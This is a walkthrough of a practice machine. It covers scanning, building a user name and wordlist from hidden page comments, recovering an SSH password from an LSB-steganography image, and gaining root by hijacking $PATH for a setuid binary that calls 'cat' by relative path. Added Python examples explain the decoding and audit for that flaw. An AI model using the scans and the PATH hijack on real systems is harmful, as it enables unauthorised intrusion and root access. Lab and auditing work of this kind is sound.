The machine can be downloaded here.
nmap -p- -sC -sV --open -oN ports.log 192.168.56.57
gobuster dir -u http://192.168.56.57 -t 50 -x .php,.html,.txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b 400,403,404,500 --wildcard -o 80.log
curl http://192.168.56.57/robots.txt
Open contract1~4.html and check the source code: nothing there.
Open sector1.html and check its source code: something is hidden there.
Download all the sector*.html pages and grep them for "secret".
for i in $(seq 1 10); do wget "http://192.168.56.57/sector$i.html"; done
grep "secret" ./*.html
Concatenate the strings to get "puppetmaster", maybe a user name.
Also, sector9.html is different from the others and mentions a secret place. Build a wordlist from it with cewl, and remember "--with-numbers".
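The gathering step above (pull every sector page, find the "secret" fragment in each, join them in page order) as an added example; this is not code from the write-up. The real pages' markup is not shown, so the sample pages below are constructed and assume the fragment sits in an HTML comment of the form <!-- secret: ... -->; the ordering helper also handles the sector10-before-sector2 trap that a plain lexical sort would fall into.

```python
import re
from pathlib import Path
from typing import Optional

# Constructed sample pages standing in for the downloaded sector*.html files.
# Assumption: each fragment is hidden in a comment of the form <!-- secret: ... -->.
SAMPLE_PAGES = {
    "sector1.html": "<html><!-- secret: pup --><body>Sector one</body></html>",
    "sector2.html": "<html><body>Sector two</body><!-- secret: pet --></html>",
    "sector3.html": "<!-- secret: mas --><html><body>Sector three</body></html>",
    "sector9.html": "<html><body>Nothing hidden on this page.</body></html>",
    "sector10.html": "<html><body>Sector ten</body><!-- secret: ter --></html>",
}

SECRET_RE = re.compile(r"<!--\s*secret\s*:\s*(\S+?)\s*-->", re.IGNORECASE)


def page_number(name: str) -> int:
    """Sort key that puts sector2.html before sector10.html (lexical order would not)."""
    m = re.search(r"(\d+)", name)
    return int(m.group(1)) if m else -1


def extract_fragment(html: str) -> Optional[str]:
    """Return the secret fragment hidden in one page, or None if the page has none."""
    m = SECRET_RE.search(html)
    return m.group(1) if m else None


def join_fragments(pages: dict) -> str:
    """Concatenate the fragments in page order, skipping pages that carry none."""
    ordered = sorted(pages, key=page_number)
    return "".join(f for f in (extract_fragment(pages[n]) for n in ordered) if f)


def load_pages(directory: str) -> dict:
    """Read the downloaded sector*.html files from a directory into a name -> html dict."""
    return {p.name: p.read_text(errors="replace") for p in Path(directory).glob("sector*.html")}


if __name__ == "__main__":
    # With the files wget fetched into the current directory: join_fragments(load_pages("."))
    print(join_fragments(SAMPLE_PAGES))  # puppetmaster
```

Sorting by the embedded number rather than by file name matters as soon as there are more than nine pages; with a lexical sort the fragment from sector10.html would land between sector1 and sector2 and the joined string would come out scrambled.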
cewl --with-numbers http://192.168.56.57/sector9.html > dic.txt
Scan for files again with this wordlist.
gobuster dir -u http://192.168.56.57 -t 50 -x .php,.html,.txt -w dic.txt -b 400,403,404,500 --wildcard
Open project2501.html and find a new, large image file.
Find the source of the image and download it.
Decode this image at "https://stylesuxx.github.io/steganography/".
Decode the resulting binary string using CyberChef.
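What the two decoding steps above do, as an added example that is not part of the write-up: a plain least-significant-bit (LSB) scheme, one message bit in the low bit of each pixel channel byte, most significant bit first, terminated by a NUL byte. This is an assumption: the page does not document the exact layout the web tool uses, and the cover below is a constructed byte array standing in for real pixel data (with a real PNG you would feed in the channel bytes read from the image). extract_lsb_bits yields the kind of binary string the page hands to CyberChef, and bits_to_text is the "From Binary" conversion done there.

```python
def embed_lsb(cover: bytes, message: str) -> bytes:
    """Write the message bits (MSB first, NUL-terminated) into the low bit of each cover byte."""
    payload = message.encode("ascii") + b"\x00"
    bits = "".join(f"{b:08b}" for b in payload)
    if len(bits) > len(cover):
        raise ValueError("cover too small for this message")
    stego = bytearray(cover)
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & 0xFE) | int(bit)  # clear the low bit, then set it to the message bit
    return bytes(stego)


def extract_lsb_bits(stego: bytes) -> str:
    """Collect the low bit of every byte and stop at the first all-zero octet (the terminator)."""
    bits = "".join(str(b & 1) for b in stego)
    usable = len(bits) - len(bits) % 8
    for i in range(0, usable, 8):
        if bits[i:i + 8] == "00000000":
            return bits[:i]
    return bits  # no terminator found: hand back everything for manual inspection


def bits_to_text(bits: str) -> str:
    """Group the bit string into octets and decode them, as CyberChef's 'From Binary' does."""
    usable = len(bits) - len(bits) % 8
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8)).decode("ascii", "replace")


def recover_message(stego: bytes) -> str:
    """Full pipeline: image bytes -> binary string -> text."""
    return bits_to_text(extract_lsb_bits(stego))


# Constructed cover: 24 pixels x 3 channels of arbitrary sample values (assumption, not a real image).
SAMPLE_COVER = bytes((i * 37) % 256 for i in range(72))

if __name__ == "__main__":
    hidden = embed_lsb(SAMPLE_COVER, "hi")
    print(extract_lsb_bits(hidden))  # 0110100001101001
    print(recover_message(hidden))   # hi
```

Because only the low bit of each byte changes, the stego image is visually identical to the cover; that is why a hidden payload is only found by reading the bits back out rather than by looking at the picture.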
Log in as "puppetmaster" via ssh, using this string as the password.
In the home folder, find "systeminfo" with the SUID bit set.
Running it directly prints some system information as root.
Decompile it and find that only "cat" is invoked by a relative path; the other commands all use absolute paths.
In the home folder, create a fake "cat" and prepend that folder to $PATH.
echo "bash" > cat
chmod +x cat
export PATH=/home/puppetmaster:$PATH
We can get root.
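The weakness behind this final step is a setuid program that names a helper tool without an absolute path, so the caller's PATH decides what actually runs as root. Below is an added audit script (not from the write-up) for finding that class of binary on a system you administer: it walks a directory tree, picks out files with the setuid bit, and lists embedded strings that invoke a known tool by bare name. The SHELL_TOOLS list and the sample string table are constructed assumptions; the string heuristic is the same one strings(1) uses and will need a human to review its hits.

```python
import os
import re
import stat

# Printable runs of at least four bytes, the same heuristic strings(1) applies.
PRINTABLE_RE = re.compile(rb"[\x20-\x7e]{4,}")

# Tools an administrative helper commonly shells out to (assumed list). A hit means the
# binary names the tool without a path, so whoever runs it controls which one executes.
SHELL_TOOLS = {"cat", "ls", "id", "uname", "ps", "df", "free", "who", "netstat", "ifconfig", "ip"}


def is_setuid(mode: int) -> bool:
    """True when the setuid bit is set in an st_mode value."""
    return bool(mode & stat.S_ISUID)


def relative_commands(blob: bytes) -> list:
    """Return embedded strings that call a known tool by bare name instead of absolute path."""
    hits = []
    for m in PRINTABLE_RE.finditer(blob):
        text = m.group().decode("ascii")
        tokens = text.split()
        if tokens and tokens[0] in SHELL_TOOLS:
            hits.append(text)
    return hits


def audit_setuid(root: str) -> dict:
    """Walk root and return {path: [suspicious strings]} for every regular setuid file."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry
            if not stat.S_ISREG(st.st_mode) or not is_setuid(st.st_mode):
                continue
            try:
                with open(path, "rb") as fh:
                    findings[path] = relative_commands(fh.read())
            except OSError:
                findings[path] = []  # setuid, but contents not readable by this user
    return findings


# Constructed stand-in for the string table of a binary like the write-up's systeminfo:
# every tool except cat is referenced by absolute path.
SAMPLE_BINARY = b"\x7fELF\x00/usr/bin/uname -a\x00cat /etc/issue\x00/bin/df -h\x00/usr/bin/id\x00"

if __name__ == "__main__":
    print(relative_commands(SAMPLE_BINARY))  # ['cat /etc/issue']
    for path, hits in audit_setuid("/usr/bin").items():
        print(path, hits or "no bare tool names found")
```

A binary this audit flags should be fixed by spelling out absolute paths for everything it executes, and by not trusting the inherited environment at all: set PATH to a fixed value before any exec, or drop the setuid bit and give the helper only the specific capability it needs.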